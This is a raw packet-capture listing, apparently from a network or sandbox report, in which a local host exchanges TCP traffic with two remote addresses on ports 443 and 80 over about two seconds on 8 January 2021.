                                                        Jan 8, 2021 09:06:11.517652035 CET49165443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.680576086 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.720607042 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.720712900 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.726763010 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.766719103 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.773158073 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.773205042 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.773220062 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.773267984 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.785875082 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:18.825841904 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:18.826107979 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.030057907 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:19.143624067 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:19.183582067 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.304924011 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.304955006 CET44349168104.22.1.232192.168.2.22
                                                        Jan 8, 2021 09:06:19.305063009 CET49168443192.168.2.22104.22.1.232
                                                        Jan 8, 2021 09:06:19.494285107 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.652462006 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.652621984 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.652738094 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.810796976 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814476967 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814513922 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814532995 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814549923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.814613104 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815541029 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815577984 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815602064 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815601110 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815625906 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815650940 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815670967 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.815684080 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815701008 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.815721989 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.972599983 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972642899 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972662926 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972685099 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.972733974 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.972889900 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973469973 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973501921 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973524094 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973550081 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973556042 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973567963 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973591089 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973613977 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973625898 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973632097 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973656893 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973673105 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973685026 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973690033 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973711967 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973731041 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973735094 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973752975 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:19.973777056 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:19.973835945 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.130754948 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130800009 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130827904 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130851984 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130876064 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.130898952 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131103039 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131129980 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131153107 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131155014 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.131179094 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131217957 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.131597996 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131649017 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.131726027 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131745100 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131761074 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131777048 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131792068 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131808043 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131824017 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.131827116 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131844997 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131860971 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131876945 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131892920 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131907940 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131916046 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.131922007 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.131923914 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131941080 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131959915 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131978035 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.131987095 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.131995916 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132014036 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132023096 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.132030010 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132045984 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132055044 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.132062912 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132080078 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132091045 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.132098913 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132117033 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132127047 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.132132053 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132153988 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132175922 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.132189035 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.133673906 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.133704901 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.289012909 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289037943 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289052010 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289067030 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289079905 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289097071 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289114952 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289132118 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289146900 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289164066 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289180040 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289201021 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289218903 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289233923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289249897 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289263010 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289305925 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.289350033 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.289443016 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289464951 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289482117 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289498091 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.289985895 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.290004015 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.290020943 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.291338921 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295063019 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295085907 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295150995 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295219898 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295238972 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295253992 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295269966 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295285940 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295300007 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295315981 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295331955 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295336962 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295351982 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295356989 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295371056 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295387030 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295402050 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295411110 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295418978 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295434952 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295444965 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295450926 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295466900 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295479059 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295485973 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295505047 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295509100 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295521021 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295537949 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295553923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295556068 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295571089 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295583963 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295598984 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.295599937 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295620918 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.295644999 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.297324896 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.447252035 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447279930 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447293043 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447304964 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447316885 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447328091 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447340012 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447356939 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447369099 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447381020 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447392941 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447398901 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.447412014 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447432995 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447448969 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447665930 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.447757959 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447782040 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447813988 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447829008 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447854996 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.447896004 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447904110 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.447913885 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.447971106 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.449131966 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.449156046 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.449234962 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453002930 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453044891 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453124046 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453335047 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453355074 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453408957 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453419924 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453428984 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453448057 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453460932 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453474045 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453490973 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453499079 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453507900 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453521013 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453531981 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453536987 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453545094 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453562021 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453578949 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453588963 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453594923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453612089 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453622103 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.453624010 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453636885 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453649998 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453665972 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.453679085 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.454118967 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.455267906 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.455286026 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.455305099 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.455322981 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.455389977 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.455411911 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605366945 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605412006 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605474949 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605478048 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605495930 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605515957 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605531931 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605547905 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605561018 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605564117 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605581045 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605597973 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605602026 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605616093 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605635881 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605653048 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605668068 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605675936 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605684996 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605701923 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605716944 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605734110 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605741978 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605751991 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605763912 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.605772972 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.605818987 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.606971025 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.606991053 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.607057095 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.610965014 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.610996008 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611073017 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611397028 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611427069 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611452103 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611474991 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611485004 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611500025 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611525059 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611550093 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611552000 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611572981 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611578941 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611598969 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611624002 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611649036 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611674070 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611676931 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611697912 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611699104 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611723900 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611747980 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611772060 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611779928 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611867905 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611879110 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.611893892 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611917019 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611939907 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.611958027 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.612054110 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.613137007 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.613167048 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.613190889 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.613221884 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.613253117 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.613311052 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.763689041 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763715029 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763734102 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763753891 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763770103 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763787031 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763803005 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763817072 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.763834000 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763851881 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763868093 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763883114 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763900042 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763916016 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763936043 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763936996 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.763947010 CET4916980192.168.2.22192.185.194.191
                                                        Jan 8, 2021 09:06:20.763955116 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763971090 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.763988018 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764003992 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764019012 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764034986 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764105082 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764125109 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764141083 CET8049169192.185.194.191192.168.2.22
                                                        Jan 8, 2021 09:06:20.764157057 CET8049169192.185.194.191192.168.2.22
